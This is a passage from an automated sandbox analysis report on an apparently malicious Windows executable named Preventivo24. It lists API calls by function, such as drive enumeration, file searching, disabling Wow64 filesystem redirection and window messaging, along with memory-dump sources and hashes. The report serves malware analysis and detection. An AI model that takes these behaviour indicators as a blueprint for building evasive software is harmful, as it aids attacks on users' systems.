                                                                                • Part of subcall function 0108AB55: AcquireSRWLockExclusive.KERNEL32(011CE928,?,?,?,00E8B4A6,011CF53C,B5580983,?,?,010B207D,000000FF,?,01003A5D,B5580983,?), ref: 0108AB60
                                                                                • Part of subcall function 0108AB55: ReleaseSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B4A6,011CF53C,B5580983,?,?,010B207D,000000FF,?,01003A5D,B5580983,?), ref: 0108AB9A
                                                                                • Part of subcall function 0108AB04: AcquireSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B517,011CF53C,01115440), ref: 0108AB0E
                                                                                • Part of subcall function 0108AB04: ReleaseSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B517,011CF53C,01115440), ref: 0108AB41
                                                                                • Part of subcall function 0108AB04: WakeAllConditionVariable.KERNEL32(011CE924,?,?,00E8B517,011CF53C,01115440), ref: 0108AB4C
                                                                              • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00EB541E
                                                                              • SendMessageW.USER32(?,0000102B,?,0000000F), ref: 00EB54CC
                                                                              • SendMessageW.USER32(?,00001003,00000001,?), ref: 00EB5573
                                                                                • Part of subcall function 00FB1C70: __cftof.LIBCMT ref: 00FB1CC0
                                                                              • SendMessageW.USER32(?,0000101E,00000000,0000FFFE), ref: 00EB5726
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$ExclusiveLock$AcquireRelease$ConditionVariableWake__cftof
                                                                              • String ID: AiFeatIco$Icon
                                                                              • API String ID: 1739475930-1280411655
                                                                              • Opcode ID: 86b3f28d3c116dc3631dae5df535cea4066a502fc3d060c1b15b11d9885df2fe
                                                                              • Instruction ID: 94af6ae9f42ab4d61d29a03a393af8b48319d519750d405cab0e046276f61079
                                                                              • Opcode Fuzzy Hash: 86b3f28d3c116dc3631dae5df535cea4066a502fc3d060c1b15b11d9885df2fe
                                                                              • Instruction Fuzzy Hash: 91526B71A00658DFDB28DF68CD48BDEBBB1BF58304F1441A9E45AAB291DB706E84CF50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 00F99E21
                                                                              • SendMessageW.USER32(?,00000443,00000000), ref: 00F99E95
                                                                              • MulDiv.KERNEL32(?,00000000), ref: 00F99ECC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSendWindow
                                                                              • String ID: NumberValidationTipMsg$NumberValidationTipTitle$Segoe UI
                                                                              • API String ID: 701072176-2319862951
                                                                              • Opcode ID: 6ef59019fc7d30453e02853d863a41203cb4eb8e574d3daa2edf55e9000547ca
                                                                              • Instruction ID: b8dfa706f743e4f8605bab9c6d6f849f18d112cc65d5174c016121328baa1dcc
                                                                              • Opcode Fuzzy Hash: 6ef59019fc7d30453e02853d863a41203cb4eb8e574d3daa2edf55e9000547ca
                                                                              • Instruction Fuzzy Hash: 04E19071A01619AFEB18DF24CC55BEDBBB2FF88300F104259E559A73C1DB746A85CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: __floor_pentium4
                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                              • API String ID: 4168288129-2761157908
                                                                              • Opcode ID: 2484f6fbabad26b42159054d5d40daf8caed5fe714c4bb68122d80cc4bbefabc
                                                                              • Instruction ID: c8b1089399b9c186189785d2459c5a540db5f59efe8a9a96edd7a3ef480257e8
                                                                              • Opcode Fuzzy Hash: 2484f6fbabad26b42159054d5d40daf8caed5fe714c4bb68122d80cc4bbefabc
                                                                              • Instruction Fuzzy Hash: 47D21A71E082298FDB65CEA8DD407EEB7B5EB48304F5541EAD58DE7240EB34AE818F41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              • GetLogicalDriveStringsW.KERNEL32(00000064,?), ref: 00FF2640
                                                                              • GetDriveTypeW.KERNEL32(?), ref: 00FF265A
                                                                              • Wow64DisableWow64FsRedirection.KERNEL32(00000000,00000000), ref: 00FF26F5
                                                                              • Wow64RevertWow64FsRedirection.KERNEL32(00000000,00000000), ref: 00FF2996
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Wow64$DriveRedirection$DisableHeapLogicalProcessRevertStringsType
                                                                              • String ID: ]%!
                                                                              • API String ID: 4157823300-1069524040
                                                                              • Opcode ID: ae6b339a6e934025ad43d5cf4671a0fa58d94da2e57b54dd11bc50e226f2dc53
                                                                              • Instruction ID: 382c9dd5f62eaed3b697aeaf310cec72d2e87145c9bacd9a3e149e5f23e60839
                                                                              • Opcode Fuzzy Hash: ae6b339a6e934025ad43d5cf4671a0fa58d94da2e57b54dd11bc50e226f2dc53
                                                                              • Instruction Fuzzy Hash: 6C02DF31A0025D8FDB24DF28CC94BADB7B5AF08310F1485E9E91AA7391DB749E85DF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,00000000,-00000010,?,B5580983,?,?,00000000), ref: 01008BFC
                                                                              • FindNextFileW.KERNEL32(?,00000000,?,00000000), ref: 01008C17
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$FirstNext
                                                                              • String ID:
                                                                              • API String ID: 1690352074-0
                                                                              • Opcode ID: 0e9633deefff460ac83f4f4079df102f10fc198cbb489f7d9257048648a6ca1c
                                                                              • Instruction ID: 5d20cf53a137a1a8f851c2465ad76b488feb66f8dab64a85219c0a32c2fc7a14
                                                                              • Opcode Fuzzy Hash: 0e9633deefff460ac83f4f4079df102f10fc198cbb489f7d9257048648a6ca1c
                                                                              • Instruction Fuzzy Hash: F4818C71900648DFEB15DFA8C948AEDBBF4FF08324F148699E829A72C1DB759A05CF50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000C,0108A0EA,00000000,?,0108A282,?,?,?,?), ref: 0108A1D0
                                                                              • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,?,?,?,?), ref: 0108A1F7
                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?), ref: 0108A1FE
                                                                              • InitializeSListHead.KERNEL32(00000000,?,?,?,?), ref: 0108A20B
                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?), ref: 0108A220
                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 0108A227
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
                                                                              • String ID:
                                                                              • API String ID: 1475849761-0
                                                                              • Opcode ID: fcc4e039517b9a4cdb53e067f9f1a65a60e7a2f26668917fae4d3c7bcc722dbb
                                                                              • Instruction ID: 3ca19eaf22c684fa73bb127c5e31a7be1f0cef70e76e207d552b1271b124ca56
                                                                              • Opcode Fuzzy Hash: fcc4e039517b9a4cdb53e067f9f1a65a60e7a2f26668917fae4d3c7bcc722dbb
                                                                              • Instruction Fuzzy Hash: 00F0AF75345251DBDB75AF2CA908B16BBE8EB85A12F040439F9E6C3388DA70C0818761
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,B5580983,?,00FFE190,00000000,?,?,?,00000000,01104AE5), ref: 0100CF2D
                                                                              • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000), ref: 0100CF62
                                                                              • ReadFile.KERNEL32(00000000,00000000,0000000A,?,00000000), ref: 0100CF84
                                                                              • ReadFile.KERNEL32(00000000,?,00000005,?,00000000), ref: 0100D06D
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0100D17D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: File$Read$CloseCreateHandlePointer
                                                                              • String ID:
                                                                              • API String ID: 3856724686-0
                                                                              • Opcode ID: 25a4778765a8949bbae0e3ae439115bafba3d41a53f13c0fc4f69123dc7486d1
                                                                              • Instruction ID: da2610c5354c5ea31c6a41979caa544869d9523fd9099a7ebc7e0042aa723384
                                                                              • Opcode Fuzzy Hash: 25a4778765a8949bbae0e3ae439115bafba3d41a53f13c0fc4f69123dc7486d1
                                                                              • Instruction Fuzzy Hash: 09C1D235A00209EBEB1ACBA8C845BBEBBF5FF48720F14419DE955A73C1DB359901CB60
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: _strrchr
                                                                              • String ID:
                                                                              • API String ID: 3213747228-0
                                                                              • Opcode ID: 6bf30f727968c550dafa84dae64e81f95c503f9883482f211eb6c0125f197d34
                                                                              • Instruction ID: 0e23934d893cab7b9ec418e0dee85a9e86885bbca35aed09b16f99efb10211c1
                                                                              • Opcode Fuzzy Hash: 6bf30f727968c550dafa84dae64e81f95c503f9883482f211eb6c0125f197d34
                                                                              • Instruction Fuzzy Hash: 04B1593290424A9FDB15CFECC8917FEBBE5EF55350F5482BAD984AB242D235D901CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b625849fc1911a65a1370238ab67aca9d4af5f2889d2e42051fdec920abe31c5
                                                                              • Instruction ID: e3992aa8cd5caae019d20bae3f5161f0df22e6a32bdedc236cc2809d6eab0317
                                                                              • Opcode Fuzzy Hash: b625849fc1911a65a1370238ab67aca9d4af5f2889d2e42051fdec920abe31c5
                                                                              • Instruction Fuzzy Hash: A391BE71901218CFDB64DF28CC49BA9BBB5AF08320F1482D9E928A73D1DB749E84CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(00000000,00000000,00000000), ref: 00FBCE62
                                                                              • FindFirstFileW.KERNEL32(?,00000000,0000002A), ref: 00FBCF06
                                                                              • FindClose.KERNEL32(00000000), ref: 00FBCF30
                                                                              • FindClose.KERNEL32(00000000), ref: 00FBCF89
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID:
                                                                              • API String ID: 2295610775-0
                                                                              • Opcode ID: 48d61fabf574e6864abdcb2f5d760d31afc284bfea1651b897d788d5c677455a
                                                                              • Instruction ID: b3e754bf61e7437ee3733a3ccc596065c68bbe3f7f34f6ef7a68f2bbf17d9331
                                                                              • Opcode Fuzzy Hash: 48d61fabf574e6864abdcb2f5d760d31afc284bfea1651b897d788d5c677455a
                                                                              • Instruction Fuzzy Hash: B651E135900209DBDB24DF66C9087FEB7B5FF55324F14829AE825A7280E7309A44DFA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: AI_CONTROL_VISUAL_STYLE$AI_CONTROL_VISUAL_STYLE_EX$AI_NO_BORDER_HOVER$AI_NO_BORDER_NORMAL
                                                                              • API String ID: 0-932585912
                                                                              • Opcode ID: 254b09410462edd77175aa8b25239f7cae6a12ee0ee0dc0ee14304929787cae0
                                                                              • Instruction ID: 7e1ad17fef91037c74ae7fc6dd073d9e47c5c3d9ce12513e4f7f21775d7303ce
                                                                              • Opcode Fuzzy Hash: 254b09410462edd77175aa8b25239f7cae6a12ee0ee0dc0ee14304929787cae0
                                                                              • Instruction Fuzzy Hash: EC42F471D002288BDB18DF68CC547AEB7F1FF8A304F148259E495BB392D778A945CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00EB672B
                                                                              • SendMessageW.USER32(?,0000102B,0000009B,-00000002), ref: 00EB6968
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: X
                                                                              • API String ID: 3850602802-298166547
                                                                              • Opcode ID: 935c33cb0906d7cdf3f562614db551556c2a040513a5141d839890bfa2bdcd91
                                                                              • Instruction ID: 0353d4f9832d168be2ff78c81bc8a70e73cb14e959667e696f1c6109ff0b2df0
                                                                              • Opcode Fuzzy Hash: 935c33cb0906d7cdf3f562614db551556c2a040513a5141d839890bfa2bdcd91
                                                                              • Instruction Fuzzy Hash: 9FC1AF71A002068FDF18CF64C995AEEBBF5FF48304F18917AD859AF295D738A941CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?,00000000,00000010), ref: 00FF3CCC
                                                                              • FindClose.KERNEL32(00000000), ref: 00FF3E4F
